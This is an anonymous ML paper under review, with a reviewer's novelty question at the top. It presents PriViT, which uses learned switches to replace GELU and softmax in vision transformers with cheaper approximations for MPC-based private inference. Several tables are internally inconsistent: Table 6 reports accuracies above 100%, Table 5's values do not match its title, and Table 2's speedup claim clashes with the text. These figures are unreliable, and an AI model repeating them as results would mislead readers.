Paper_ID: 8w6FzR68DS
Question: While the paper introduces an interesting approach, its novelty appears constrained. The core concept of utilizing binary gates to manage the number of nonlinear operations through $\ell_0$ sparsity was introduced in SNL (Cho et al., 2022b). The proposed method seems like an adaptation of SNL for ViTs. This adaptation is intriguing, but a deeper exploration of its unique contributions compared to SNL would provide more clarity on its novelty.
# PriViT: Vision Transformers for Fast Private Inference

Anonymous authors. Paper under double-blind review.

**Abstract.** The Vision Transformer (ViT) architecture has emerged as the backbone of choice for state-of-the-art deep models for computer vision applications. However, ViTs are ill-suited for private inference using secure multi-party computation (MPC) protocols, due to the large number of non-polynomial operations (self-attention, feed-forward rectifiers, layer normalization). We propose PriViT, a gradient-based algorithm to selectively "Taylorize" nonlinearities in ViTs while maintaining their prediction accuracy. Our algorithm is conceptually simple, easy to implement, and achieves improved performance over existing approaches for designing MPC-friendly transformer architectures in terms of the latency-accuracy Pareto frontier. We confirm these improvements via experiments on several standard image classification tasks.

## 1 Introduction

**Motivation.** Deep machine learning models are increasingly being deployed by cloud-based providers, accessible only via API calls. In such cases, user data privacy becomes paramount, motivating the setting of private inference (PI) using secure multiparty computation (MPC). In its simplest form, MPC-based private inference is a two-party setup where a user (the first party) performs inference of their data on a model whose weights are owned by the cloud service provider (the second party), with both sides encrypting their inputs using cryptographic techniques prior to inference.

The main technical barrier to widespread deployment of MPC-based PI protocols is the large number of nonlinear operations present in a deep neural network model. Private execution of linear (or low-degree polynomial) operations can be made fast using cryptographic protocols like homomorphic encryption and/or secret sharing. However, private execution of nonlinear operations (such as ReLUs or softmaxes) requires Yao's Garbled Circuits, incurring high latency and storage overhead. Thus, unlocking fast, accurate, and efficient PI requires rethinking network design.

Consequently, an emerging line of work has made several forays towards the design of "MPC-friendly" models; cf. the discussion in Section 2. These methods approach PI from different angles. Approaches such as Delphi (Mishra et al., 2020a) or Circa (Ghodsi et al., 2021) propose to replace ReLUs with MPC-friendly approximations, while approaches such as CryptoNAS (Ghodsi et al., 2020) and Sphynx (Cho et al., 2021) use neural architecture search (NAS) to find network backbones with a minimal number of ReLUs. Peng et al. (2023) propose hardware-aware ReLU-reduced networks to achieve better latencies. The latest approaches in this direction (SNL by Cho et al., 2022a, and SENet by Kundu et al., 2023) derive inspiration from network pruning.

However, this body of work has gaps. The overwhelming majority of PI-aware model approaches have focused on convolutional architectures and have largely ignored transformer models. In particular, the proper application of MPC to vision transformer architectures remains far less studied; see Table 1. Vision transformers (Dosovitskiy et al., 2020) currently rank among the best-performing deep models in numerous computer vision tasks, spanning image classification, generation, and understanding. On the other hand, vision transformers are very bulky, possessing an enormous number of nonlinear operations of different types: GELUs, softmaxes, and layer norms.
As of early September 2023, the only published approach addressing private inference for vision transformers is the MPCViT framework of Zeng et al. (2022); they use a carefully constructed combination of NAS, various simplifications of the attention mechanism, and knowledge distillation (Hinton et al., 2015) to achieve highly competitive results on common image classification benchmarks.

Table 1: Comparison of various MPC-friendly approaches for deep image classification. NAS stands for neural architecture search; GD stands for gradient descent. Our approach, PriViT, adaptively replaces various nonlinearities present in transformers with their Taylorized versions in order to reduce PI latency costs without a drop in accuracy.

| Approach | Arch | Methods | Units removed |
|---|---|---|---|
| Delphi (Mishra et al., 2020a) | ConvNets | NAS + poly approx. | ReLU layers |
| CryptoNAS (Ghodsi et al., 2020) | ResNets | NAS | ReLU layers |
| Sphynx (Cho et al., 2021) | ResNets | NAS | ReLU layers |
| DeepReDuce (Jha et al., 2021) | ResNets | manual | ReLU layers |
| SNL (Cho et al., 2022a) | ResNets | GD | Individual ReLUs |
| SENet (Kundu et al., 2023) | ResNets | GD | Individual ReLUs |
| MPCFormer (Li et al., 2022) | BERT | NAS + poly approx. | GELU layers, softmaxes |
| MPCViT (Zeng et al., 2022) | ViT | NAS + poly approx. | GELU layers, softmaxes |
| PriViT (this paper) | ViT | GD + poly approx. | Individual GELUs, softmaxes |

**Our contributions and techniques.** In this paper we introduce PriViT, an algorithm for designing MPC-friendly vision transformers. PriViT considerably improves upon the previous best results for PI using vision transformers (MPCViT), both in terms of latency and accuracy on TinyImagenet, and achieves competitive results on CIFAR 10/100. At a high level, our approach mirrors the network linearization strategy introduced in the SNL method by Cho et al. (2022a). We start with a pre-trained ViT model with frozen weights, but replace nonlinear operations with their switched Taylorized versions:

- Each GELU unit $\text{GELU}(x_i)$ is replaced by $c_i \cdot \text{GELU}(x_i) + (1 - c_i) \cdot x_i$; and
- Each row-wise softmax operation $\text{Softmax}(X_i)$ is replaced by $s_i \cdot \text{Softmax}(X_i) + (1 - s_i) \cdot \text{SquaredAttn}(X_i)$,

where SquaredAttn is the unnormalized quadratic kernel and $c_i$, $s_i$ are binary switching variables. These switches decide whether to retain the nonlinear operation or to replace it with its Taylor approximation (linear in the case of GELU, quadratic in the case of softmax); a minimal code sketch of the switched operations appears below. Having defined this new network, we initialize all switch variables to 1, make weights as well as switches trainable, and proceed with training using gradient descent.

Some care needs to be taken to make things work. We seek to eventually set most of the switching variables to zero, since our goal is to replace most nonlinearities with linear units or low-degree polynomials; the surviving switches should be set to one. We achieve this by augmenting the standard cross-entropy training loss with an $\ell_1$-penalty term that promotes sparsity in the vector of all switch variables, applying a homotopy-style approach that gradually increases this penalty if sufficient sparsity is not reached, and finally binarizing the variables via rounding. We can optionally perform knowledge distillation; see Section 5 for details.
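The switching construction translates directly into code. Below is a minimal PyTorch sketch of the two switched operations; the module names (`SwitchedGELU`, `SwitchedAttention`) and the exact switch granularity shown here are our illustrative assumptions, not the authors' released implementation.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class SwitchedGELU(nn.Module):
    """c_i * GELU(x_i) + (1 - c_i) * x_i, with one switch per token."""
    def __init__(self, num_tokens):
        super().__init__()
        self.c = nn.Parameter(torch.ones(num_tokens))  # switches start at 1

    def forward(self, x):                    # x: (batch, tokens, dim)
        c = self.c.view(1, -1, 1)            # broadcast over batch and channels
        return c * F.gelu(x) + (1 - c) * x

class SwitchedAttention(nn.Module):
    """s_i * Softmax(X_i) + (1 - s_i) * SquaredAttn(X_i), per attention row."""
    def __init__(self, num_rows):
        super().__init__()
        self.s = nn.Parameter(torch.ones(num_rows))

    def forward(self, scores):               # scores: (batch, heads, rows, cols)
        n = scores.shape[-1]
        soft = scores.softmax(dim=-1)
        squared = scores.pow(2) / n          # unnormalized quadratic kernel
        s = self.s.view(1, 1, -1, 1)
        return s * soft + (1 - s) * squared
```

Initializing all switches to 1 recovers the original pre-trained network exactly, so training starts from a known-good point.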
**Discussion and implications.** We note that the previous state-of-the-art, MPCViT, also follows a similar strategy as Cho et al. (2022a): selectively replace both GELUs and softmax operations in vision transformers with their linear (or polynomial) approximations. However, they achieve this via a fairly complex MPC-aware NAS procedure. A major technical contribution of their work is the identification of a (combinatorial) search space, along with a differentiable objective to optimize over this space. Our PriViT algorithm, on the other hand, is conceptually much simpler and can be applied out-of-the-box to any pre-trained ViT model. The only price to be paid is the computational overhead of training the new switching variables, which incurs extra GPU memory and training time.

While our focus in this paper is sharply on private inference, our results may also hold implications for the importance of nonlinearities at various transformer layers. Indeed, we see consistent trends in the architectures obtained via PriViT. First, most nonlinear operations in transformers are redundant. PriViT is able to remove nearly 83% of GELUs and 97% of softmax operations with less than 0.5% reduction in accuracy over CIFAR100 (Krizhevsky et al., 2009).¹ Second, given a target overall budget of softmaxes and GELUs, PriViT overwhelmingly chooses to retain most of the nonlinearities in earlier layers, while discarding most of the later ones. These findings suggest that there is considerable room for designing better architectures than merely stacking up identical transformer blocks, but we defer a thorough investigation of this question to future work.

¹Via several ablation studies we justify why we choose these particular approximations for these functions.

Table 2: Accuracy-latency tradeoffs between PriViT and MPCViT. All latencies are calculated with the Secretflow (Ma et al., 2023) framework using the SEMI2K (Cramer et al., 2018) protocol. Detailed methodology is reported in Appendix A. **Left:** Comparison of PriViT versus MPCViT on TinyImageNet. PriViT achieves a 6.6× speedup at an isoaccuracy of approximately 63%. **Right:** Comparison of PriViT versus MPCViT on CIFAR-100. Due to ViT architecture differences, PriViT uses a much larger model with 3× more input tokens, and is able to achieve nearly percentage points increase in CIFAR-100 accuracy with only a 27% increase in latency. Mirroring the MPCViT+ approach, we also report the effect of PriViT with all GELUs replaced with ReLUs, and again show competitive performance.

| PriViT Acc | Lat. (s) | MPCViT Acc | Lat. (s) | PriViT (GELU) Acc | Lat. (s) | MPCViT Acc | Lat. (s) | PriViT (ReLU) Acc | Lat. (s) | MPCViT+ Acc | Lat. (s) |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 78.88 | 31.77 | 62.55 | 150.83 | 78.51 | 17.75 | 77.8 | **9.16** | 78.37 | 16.77 | 77.1 | **9.05** |
| 78.16 | 28.45 | 63.7 | 95.75 | 80.49 | 14.21 | 76.9 | 8.76 | 78.73 | 13.46 | 76.8 | 8.77 |
| 75.5 | 20.47 | 63.36 | 71.04 | 78.5 | 14.08 | 76.9 | 8.21 | 77.1 | 10.62 | 76.3 | 8.37 |
| **64.46** | **14.41** | **62.62** | **43.96** | **77.74** | **11.69** | **76.4** | **7.86** | **76.59** | **12.43** | **76.2** | **7.94** |

## 2 Preliminaries

**Private inference.** Prior work on private inference (PI) has proposed methods that leverage existing cryptographic primitives for evaluating the output of deep networks. Cryptographic protocols can be categorized by the choice of ciphertext computation used for linear and non-linear operations.
Operations are computed using some combination of: (1) secret sharing (SS) (Shamir, 1979; Micali et al., 1987); (2) partially homomorphic encryption (PHE) (Gentry & Halevi, 2011), which allows limited ciphertext operations (e.g., additions and multiplications); and (3) garbled circuits (GC) (Yao, 1982; 1986). In this paper, our focus is exclusively on the Delphi protocol (Mishra et al., 2020a) for private inference. We choose Delphi as a matter of convenience: the general trends discovered in our work hold regardless of the encryption protocol, and to validate this we measure latency of our PriViT-derived models using multiple protocols. Delphi assumes a threat model in which both parties are honest-but-curious: each party strictly follows the protocol, but may try to learn information about the other party's input from the transcripts it receives during the protocol. This threat model is standard in prior PI work (Wang et al., 2022; Peng et al., 2023; Lu et al., 2021; Qin et al., 2022).

Delphi is a hybrid protocol that combines cryptographic primitives such as secret sharing (SS) and homomorphic encryption (HE) for all linear operations, and garbled circuits (GC) for ReLU operations. Delphi divides private inference into two phases: an offline phase and an online phase. Delphi's cryptographic protocol allows for front-loading all input-independent computations to the offline phase, which makes ciphertext linear computations as fast as plaintext linear computations during the actual inference. For convolutional architectures, the authors of Delphi show empirical evidence that ReLU computation requires 90% of the overall private inference time for typical deep networks. As a remedy, Delphi and SAFENet (Lou et al., 2021) propose neural architecture search (NAS) to selectively replace ReLUs with polynomial operations. CryptoNAS (Ghodsi et al., 2020), Sphynx (Cho et al., 2021), and DeepReDuce (Jha et al., 2021) design new ReLU-efficient architectures using macro-search NAS, micro-search NAS, and multi-step optimization, respectively.

**Protocols for nonlinearities.** To standardize across different types of non-linear activations, we compare their Delphi (online) GC computation costs. We use the EMP Toolkit (Wang et al., 2016), a widely used GC framework, to generate GC circuits for nonlinear functions. High-performance GC constructions implement AND and XOR gates, where XOR is implemented using FreeXOR (Kolesnikov & Schneider, 2008) and AND using Half-Gate (Zahur et al., 2015). With FreeXOR, XOR gates have negligible cost, so we count the number of AND gates as the cost of each nonlinear function (Mo et al., 2023b). To be consistent with prior work (Ghodsi et al., 2021), the cost of each activation function also includes value recovery from secret sharing. Figure 1 (left) breaks down the GC cost of a ViT for different nonlinearities, and (right) shows the number of AND gates in softmax and GELU. Figure 2 breaks down softmax into fundamental operations; these operations are already synthesized and included in the EMP Toolkit library, so we simply add up the AND gates of these basic operations to arrive at the total number of AND gates of a softmax operation.
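The same accounting carries over to the latency estimates used later in Section 4.1, where each nonlinearity is priced in ReLU-equivalents. A minimal sketch, assuming the per-function conversion factors reported in Table 7 and hypothetical operation counts:

```python
# GC cost of each nonlinearity in ReLU-equivalents (one scalar ReLU = 1);
# factors taken from Table 7.
RELU_OPS = {
    "softmax_197": 18586,    # row-wise softmax over a length-197 vector
    "layernorm_192": 6504,   # layernorm over a length-192 vector
    "gelu": 270,             # pointwise GELU on one scalar
}

def estimate_relu_ops(op_counts):
    """Weighted sum of operation counts, in ReLU-equivalent operations."""
    return sum(RELU_OPS[op] * n for op, n in op_counts.items())

# Hypothetical model from the text: 1000 of each operation.
total = estimate_relu_ops({"softmax_197": 1000, "layernorm_192": 1000, "gelu": 1000})
print(total)  # 25360000 ReLUOps
```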
Figure 1: Breakdown of latency of different non-linearities in the ViT-Tiny model, based on Delphi.

Figure 2: Detailed steps of benchmarking the non-linearity cost for softmax.

## 3 PriViT: Privacy-Friendly Vision Transformers

### 3.1 Setup

Following Cho et al. (2022a), Ghodsi et al. (2020), and Mo et al. (2023a), we exclusively focus on Delphi (Mishra et al., 2020b) as the protocol for private inference. However, we emphasize that this choice is only due to convenience, and that our approach extends to any privacy-preserving protocol that relies on reducing nonlinearities to improve PI latency.

Let \( f_W : \mathbb{R}^{n \times d} \rightarrow [0, 1]^C \) be a vision transformer that takes as input \( n \) tokens (each of \( d \) dimensions) and outputs a vector of probabilities for each of \( C \) classes. Each of these tokens is a patch sampled from the original image \( X \) and is indexed by \( i \). As described, the transformer architecture consists of stacked layers of multi-headed self-attention blocks with nonlinearities like GELU (Hendrycks & Gimpel, 2016) and layernorm (Ba et al., 2016). ViTs use dot-product self-attention (see Equation 1), which additionally consists of \( n \) row-wise softmax operations:
$$
o = \text{Softmax}\left(\frac{XW_q W_k^T X^T}{\sqrt{d}}\right) XW_v. \tag{1}
$$

To frame the computational challenges inherent to vision transformers, consider the ViT-base (12-layer) model designed for \( 224 \times 224 \) images. Its architecture comprises approximately 726,000 GELUs, 28,000 softmaxes, and 4,000 layernorms. All of these non-linearities, when viewed through the lens of the Delphi protocol, become extremely resource-intensive operations. Our PriViT algorithm designs an architecture that circumvents these computationally heavy operations. Our proposition is to surgically introduce appropriate Taylor approximations of the GELU and softmax attention operations wherever possible (under the constraint that the accuracy drop due to such approximations is minimal). The main challenge is to figure out where to apply these approximations, which we describe below.

Our algorithm can be viewed as an extension of SNL (Cho et al., 2022b), a network linearization approach. SNL allows for automatic linearization of feed-forward networks through the use of parametric ReLU activations and optimization of a Lasso-like loss (Tibshirani, 1996). While SNL can reasonably be used to linearize ReLUs (GELUs) in ViTs, it does not support linearizing softmax operations, which form a large proportion of nonlinearities in ViTs. We therefore add a reparametrized normalization layer that allows a choice between softmax and SQUAREDATTN. Note that this is distinct from many existing approaches (Qin et al., 2022; Lu et al., 2021; Wang et al., 2020; Song, 2021) that propose blanket alternatives to softmax attention throughout the network.

### 3.2 PriViT Algorithm

To begin, we focus on softmaxes and GELUs and ignore layernorms, which we found far harder to Taylorize. For both, we introduce auxiliary variables that act as switches. Given \( f_W \), let \( G \) and \( S \) be the total number of GELUs and softmaxes, respectively. Further, let \( \mathcal{S} = [s_1, s_2, \ldots, s_S] \) and \( \mathcal{C} = [c_1, c_2, \ldots, c_G] \) be collections of binary switch variables defined for all instances of softmax and GELU activations. Our goal is to learn \( W, \mathcal{S}, \) and \( \mathcal{C} \) to ensure high accuracy with as few nonlinearities as possible.
We also use $N$ to denote the number of tokens, $H$ the number of heads, and $m$ the size of the token embedding (and consequently the output size of the feedforward MLP).

**GELU.** For GELU operations, we define a switched version of the GELU activation:
$$f(c_i, x_i) = c_i \,\text{GELU}(x_i) + (1 - c_i)x_i,$$
$$y = [f(c_1, x_1), f(c_2, x_2), \ldots, f(c_N, x_N)],$$
where $c_i$ is the auxiliary variable for the $i^{th}$ token, $x_i$ is the $i^{th}$ input token embedding of dimension $m$ ($m$ being the MLP dimension), and $y \in \mathbb{R}^{N \times m}$ is the output. During training, the $c_i$ are real-valued, trainable, and initialized to 1. During inference, we binarize all $c_i$ using an indicator function $\mathbb{1}_{c_i > \epsilon}$, where $\epsilon$ is an appropriately chosen threshold. $c_i = 1$ implies that the GELU is preserved, whereas $c_i = 0$ reverts to the linear activation. Figure 13 in the Appendix shows a graphical representation of the GELU parametrization. Note that GELU is a pointwise function and is therefore applied elementwise.

**Softmax attention.** The next step is to reparameterize softmax attention. Unlike GELUs, however, the choice of parameterization is not obvious here. Under the Delphi protocol, exponentials are extremely expensive to compute, while polynomials are comparatively cheap. Moreover, division by a constant can be folded into adjacent linear operations, unlike the input-dependent division in softmax. We therefore propose a modified "squared attention" block:
$$\text{SQUAREDATTN}(X) = \frac{(XW_q W_k^T X^T)^2}{N} XW_v,$$
wherein we apply pointwise squaring instead of a row-wise softmax and divide by the number of tokens. Squared attention is MPC-friendly for the reasons described above, while preserving performance relative to the original softmax. As with GELUs, we add a learnable auxiliary variable $s_i$ for every row-wise softmax operation in the attention layer:
$$o = s_i \,\text{Softmax}(X_i) + (1 - s_i)\,\text{SQUAREDATTN}(X_i),$$
where $X_i$ is the $i^{th}$ row of the attention matrix. As before, the $s_i$ are real-valued, trainable, and initialized to 1. The variables are binarized during inference, selecting either softmax or squared attention based on the value of $s_i$. Ablations over different candidate attention functions are presented in the results section.

### 3.3 Training PriViT

To train PriViT models, we need to train three sets of variables: the weights of the transformer, $W$; the switch variables for the GELU parameterization, $\mathcal{C}$; and the switch variables for the attention parametrization, $\mathcal{S}$. Our goal is to train a model that satisfies a given nonlinearity budget, that is, $\|\mathcal{C}\|_0 < B_g$ and $\|\mathcal{S}\|_0 < B_s$ for given GELU and softmax budgets $B_g, B_s$, while maximizing overall performance. This is reminiscent of standard LASSO-style (Tibshirani, 1996) optimization. We therefore propose the following loss function:
$$L_{\text{privit}} = L(f_W(X), y) + \lambda_g \sum_{i=1}^{|\mathcal{C}|} |c_i| + \lambda_s \sum_{j=1}^{|\mathcal{S}|} |s_j|, \tag{6}$$
where $L$ is the standard cross-entropy loss. We then optimize each of the variables until the required softmax attention and GELU budgets are met. We show pseudocode for our training algorithm in Algorithm 1 in the Appendix.
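Equation (6) is a few lines of PyTorch given access to the switch parameters. The function below is a hedged sketch: `gelu_switches` and `softmax_switches` are assumed to be lists of the $c$ and $s$ parameter tensors collected from the model, and the default $\lambda$ values follow the experimental setup in Section 4.1.

```python
import torch.nn.functional as F

def privit_loss(logits, targets, gelu_switches, softmax_switches,
                lambda_g=3e-5, lambda_s=3e-5):
    """Cross-entropy plus Lasso penalties on the switch variables (Eq. 6)."""
    ce = F.cross_entropy(logits, targets)
    l1_gelu = sum(c.abs().sum() for c in gelu_switches)
    l1_soft = sum(s.abs().sum() for s in softmax_switches)
    return ce + lambda_g * l1_gelu + lambda_s * l1_soft
```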
Optionally, we can make use of knowledge distillation during both training and fine-tuning. We introduce a KL divergence loss on the soft labels generated by the teacher and student ViT models. This loss is added to the $L_{\text{privit}}$ loss defined in Eq. 6, so our final minimization objective is
$$\min_{W,\mathcal{C},\mathcal{S}} L(f_W(X), y) + \lambda_g \sum_{i=1}^{|\mathcal{C}|} |c_i| + \lambda_s \sum_{j=1}^{|\mathcal{S}|} |s_j| + L_{kl}(f_W(X), f_T(X)),$$
where $T$ denotes the weights of the teacher model and $L_{kl}$ is the KL divergence loss. After every epoch, we count the number of GELUs and softmax attention operations by thresholding the $s_i$ and $c_i$ values. Once the model satisfies the required budgets, we freeze the chosen GELUs and softmax attention operations by binarizing all $s_i$ and $c_i$ values, and fine-tune the model weights for the classification task. Figure 15 provides a complete illustration.

## 4 Results

### 4.1 Experimental Setup

**Architecture and dataset.** We apply the PriViT algorithm to a pretrained checkpoint of ViT-Tiny (Steiner et al., 2021) that is trained on ImageNet-21k (14 million images, 21,843 classes) at resolution $224 \times 224$ and fine-tuned on ImageNet 2012 (1 million images, 1,000 classes) at resolution $224 \times 224$. The pretrained ViT-Tiny checkpoints are made available by WinKawaks (2022). In this work we focus on finetuning an existing model checkpoint such as ViT-Tiny on a target standard image classification dataset (CIFAR10/100 (Krizhevsky et al., 2009) and Tiny-ImageNet). CIFAR10/100 images are $32 \times 32$ while Tiny-ImageNet images are $64 \times 64$; all images were resized to $224 \times 224$ before being given as input. CIFAR10 has 10 classes with 5,000 training images and 1,000 test images per class. CIFAR100 has 100 classes with 500 training images and 100 test images per class. Tiny-ImageNet has 200 classes with 500 training images and 50 test images per class. We also perform hyperparameter tuning and present more details in Appendix A.

**ViT teacher pretraining.** As the base model, we finetune a pretrained ViT-Tiny on CIFAR10/100 for 10 epochs. We use AdamW (Loshchilov & Hutter, 2017) as the optimizer with an initial learning rate of 0.0001 and weight decay of 0.0001, and decay the learning rate every 30 epochs by multiplying it by 0.1. The batch size is 64. We use the same hyperparameters for the TinyImagenet model as well. We use these weights to initialize PriViT and start knowledge distillation.

**Joint optimization of student ViT and parametric nonlinearities.** We use the Adam (Kingma & Ba, 2014) optimizer with a learning rate of 0.0001. We use knowledge distillation with soft labels generated by the teacher model at a temperature of 4. The total loss is $L = L_{\text{priViT}} + L_{KL}$, where $L_{\text{priViT}}$ is Equation 6 and $L_{KL}$ is the KL divergence loss between the logits of the teacher and student models. The Lasso coefficients (Tibshirani, 1996) for the parametric GELU and attention masks are set to $\lambda_g = 0.00003$ and $\lambda_s = 0.00003$, respectively, at the beginning of the search. We use 5 warmup epochs, during which we do not change any hyperparameters of the model. Post warmup, we increase $\lambda_g$ by a multiplicative factor of 1.1 at the end of each epoch if the number of active GELUs in the current epoch does not decrease by at least 2 compared to the previous epoch. A GELU/softmax is considered active if its corresponding auxiliary variable is greater than the threshold hyperparameter $\epsilon = 0.001$. We follow the same approach for $\lambda_s$, with a multiplicative factor of 1.1 and a decrease threshold of 200.
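The post-warmup homotopy schedule and the binarization step can be sketched as follows. The helper names are ours; $\epsilon = 0.001$ and the decrease thresholds (2 GELUs, 200 softmaxes) follow the text above.

```python
import torch

EPS = 1e-3  # a switch is "active" if its magnitude exceeds this threshold

def count_active(switches):
    """Number of switch variables still above the activity threshold."""
    return sum((s.detach().abs() > EPS).sum().item() for s in switches)

def update_lambdas(lambda_g, lambda_s,
                   active_gelus, prev_gelus,
                   active_softmax, prev_softmax):
    """Post-warmup homotopy: grow a penalty by 1.1x when sparsification stalls
    (fewer than 2 GELUs / 200 softmaxes deactivated since the last epoch)."""
    if prev_gelus - active_gelus < 2:
        lambda_g *= 1.1
    if prev_softmax - active_softmax < 200:
        lambda_s *= 1.1
    return lambda_g, lambda_s

def binarize_and_freeze(switches):
    """Round switches to {0, 1} and freeze them once the budgets are met."""
    with torch.no_grad():
        for s in switches:
            s.copy_((s.abs() > EPS).float())
            s.requires_grad_(False)
```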
**Binarizing parametric nonlinearities, finetuning.** When the GELU and softmax budgets are satisfied, we binarize and freeze the GELU and softmax auxiliary variables. We subsequently finetune the model for 50 epochs using AdamW with a learning rate of 0.0001, weight decay of 0.0001, and a cosine annealing learning rate scheduler (Loshchilov & Hutter, 2016). Our finetuning continues to use knowledge distillation as before.

**Non-linearity cost comparison.** We conduct experiments to assess the computational cost of non-linear functions such as layernorm, softmax, and GELU in comparison to ReLU within GC. The detailed results are reported in Table 7, where the number in brackets denotes the vector length over which the cost is amortized; e.g., Layernorm(192) is an operation over a vector of length 192 and costs $6504\times$ as much as a ReLU. The table demonstrates that layernorm and softmax incur far higher computational costs (i.e., numbers of AND gates) than ReLU: for a vector length of 197, softmax costs $18586\times$ and layernorm (over a length-192 vector) $6504\times$ that of a ReLU, while pointwise GELU costs $270\times$ that of a ReLU. The cost of the denominator of layernorm and softmax can be amortized over the whole vector, so these operations incur less per-element cost than GELU. We estimate the latency of each model generated by PriViT using these conversion factors. As an example, we estimate the non-linearity cost of a hypothetical model with 1000 softmax operations, 1000 layernorm operations, and 1000 GELUs by taking the weighted sum of each operation count with its corresponding latency factor.

Table 3: Base model architectures of PriViT and MPCViT.

| Model | Layers | Width | MLP | Heads | Image size | Patch size | Params (M) |
|---|---|---|---|---|---|---|---|
| PriViT | 12 | 192 | 768 | 3 | 224×224 | 16×16 | 5.8 |
| MPCViT (Tiny Imagenet) | 9 | 192 | 384 | 12 | 64×64 | 4×4 | - |
| MPCViT (Cifar 10/100) | 7 | 256 | 512 | 4 | 32×32 | 4×4 | 3.72 |

Table 4: Comparison of PriViT-R, PriViT-G, and MPCViT over Tiny Imagenet.

| PriViT-R Acc | PriViT-R Latency (M) | PriViT-G Acc | PriViT-G Latency (M) | MPCViT Acc | MPCViT Latency (M) |
|---|---|---|---|---|---|
| 64.73 | 69.11 | 69.8 | 151.75 | 62.35 | 381.42 |
| 61.08 | 67.08 | 66.98 | 150.23 | 63.7 | 337.35 |
| 56.83 | 69.28 | 64.46 | 110.60 | 63.36 | 307.45 |
| 57.65 | 82.77 | 60.53 | 93.72 | 62.62 | 282.42 |

Table 5: Comparison of training efficiency between PriViT and MPCViT on ViT-Tiny.

| Dataset | PriViT | MPCViT |
|---|---|---|
| TinyImagenet | 151.75 | 69.8 |
| | 128.23 | 66.98 |
| | 130.60 | 70.46 |
| CIFAR 100 | 88.24 | 78.5 |
| | 77.54 | 77.24 |
| | 67.54 | 75.47 |

**GELU replacement post training.** Mirroring the MPCViT+ approach, we also report the effect of PriViT with all GELUs replaced with ReLUs; we call this model PriViT-R, and the original PriViT model PriViT-G. Note that this optimization is effective at low GELU budgets, where it introduces minimal error. At high GELU budgets the error is significant enough to affect overall performance.

### 4.2 Comparison with prior art

We benchmark PriViT against MPCViT, using the checkpoints publicly shared by the authors. We use the latency estimates reported in Section 4.1 and report total latency. Specifically, we convert the latency contribution of non-linear operations to ReLU equivalents. We refer to the latency of a single ReLU operation as a 'ReLUOp' for a given system.
We can therefore measure other non-linearities in terms of ReLUOps. This proxy has the advantage that it abstracts away system-level variables like hardware, memory, and bandwidth, which often cause variance in benchmarking. Table 3 highlights the differences in base model architecture between PriViT and MPCViT.

**Pareto analysis of PriViT over TinyImagenet and Cifar10/100.** In our evaluation on various datasets, the performance of PriViT was benchmarked against both MPCViT and MPCViT+. We measure two metrics of importance: latency (in ReLUOps) and accuracy. An ideal private inference algorithm achieves high accuracy at low latency.

1. Tiny ImageNet: In a Pareto analysis on the Tiny ImageNet dataset, PriViT shows notable improvement. For an isoaccuracy of approximately 63%, PriViT-G and PriViT-R achieve 3× and 4.7× speedups over MPCViT, respectively, as reported in Table 4.
2. CIFAR-10: We observe from Figure 3 that in certain latency regimes PriViT performs just as well as MPCViT, and slightly worse than MPCViT+, in the trade-off between performance and computational efficiency.
3. CIFAR-100: On CIFAR-100, the performance nuances become more evident. PriViT-G performs just as well as MPCViT but slightly worse than MPCViT+. PriViT-R, however, performs much better than both MPCViT and MPCViT+, indicating the competitive nature of the two algorithms on this dataset.

Table 5 shows that PriViT, at a similar accuracy (64%), requires about half the training epochs of MPCViT on TinyImagenet. For an isolatency of 75M ReLUOps on CIFAR 100, PriViT also needs only about 50% of MPCViT's training epochs. This demonstrates PriViT's enhanced efficiency and scalability, making it a promising alternative to MPCViT, particularly in situations valuing efficiency and performance.

### 4.3 Ablation studies

**Contribution of knowledge distillation.** In PriViT, we incorporate knowledge distillation (KD) alongside supervised learning. To assess the contribution of KD to overall performance, we trained PriViT on the TinyImagenet dataset with varying non-linearity budgets, and compared its performance to a version of PriViT (as outlined in Figure 15) that does not employ a teacher model for knowledge distillation. Our results in Figure 4 indicate that, under identical latency conditions, incorporating KD enhances performance by approximately 5%.

Figure 3: Comparison of PriViT over CIFAR 10/100, benchmarked against MPCViT and MPCViT+. Latency is calculated as per Section 4.1.

Table 6: Latency comparison between PriViT and PriViT w/o pretraining.

| Latency (M) | PriViT Accuracy (%) | PriViT w/o pretrain Accuracy (%) |
|---|---|---|
| 27.98 | 75.5 | 234.18 |
| 151.74 | 69.98 | 54.6 |
| 128.23 | 66.98 | 167.20 |
| 93.71 | 60.53 | 183.31 |

Table 7: Non-linearity cost normalized to the cost of one ReLUOp, i.e., one ReLU operation over a scalar value.

| Function | # ReLUOps | Function | # ReLUOps | Function | # ReLUOps |
|---|---|---|---|---|---|
| Softmax(197) | 18586 | ReLU Softmax(257) | 4428 | ReLU Softmax(65) | 1133 |
| Layernorm(192) | 6504 | Layernorm(192) | 6504 | Layernorm(256) | 8614 |
| GeLU(1) | 270 | GeLU(1) | 270 | GeLU(1) | 270 |
| x²(197) | 3248 | | | | |

Figure 4: We evaluated PriViT with and without KD.
The x-axis represents latency measured as per Section 4.1, while the y-axis shows accuracy on TinyImagenet. We observe an overall improvement in the latency-accuracy curve, motivating the use of KD.

**Contribution of pretraining.** In PriViT, we utilize a pretrained checkpoint, which is subsequently fine-tuned. Post fine-tuning, we introduce the parametric GELU and attention mechanisms to decrease non-linearities in the model. To gauge the impact of using a pretrained model on overall performance, we contrast PriViT with a variant that is not built upon a pretrained model; instead, this variant is initialized from scratch and trained with the same parametric non-linearity mask as PriViT to minimize non-linearities. The comparative outcomes are presented in Table 6. Our findings reveal that, at comparable latencies, PriViT with the pretrained checkpoint outperforms its counterpart without it, registering a 14% improvement in accuracy.

**Choice of softmax approximation.** To highlight the contribution of the different candidate attention functions, we run PriViT over different softmax budgets on CIFAR100, and report the accuracy of the resulting model versus the number of original softmax attention operations retained. A lower number of retained softmax operations implies that more softmax attention operations are replaced with the candidate attention operation. As per Figure 5, at low budgets we see almost no performance drop for SQUAREDATTN, a roughly 5% drop for SCALEATTN, and a 10% drop for UNIFORMATTN.

Table 8: Comparing PriViT and layerwise linearization of GELU in a ViT model with 200K GELUs. Six models were generated by replacing two GELU layers at a time with the identity.

| Layerwise: GELU (K) | Layerwise: Acc (%) | PriViT: GELU (K) | PriViT: Acc (%) |
|---|---|---|---|
| 197 | 96.07 | 200 | 95.59 |
| 193 | 95.91 | 150 | 95.34 |
| 187 | 94.28 | 100 | 95.58 |
| 181 | 93.33 | 50 | 94.98 |
| 174 | 93.54 | 10 | 94.24 |
| 164 | 92.06 | 1 | 93.96 |
| 123 | 82.48 | | |
| 0 | 56.64 | | |

Thus SQUAREDATTN outperformed the others across all softmax budgets, motivating its selection to replace the standard softmax attention in PriViT.

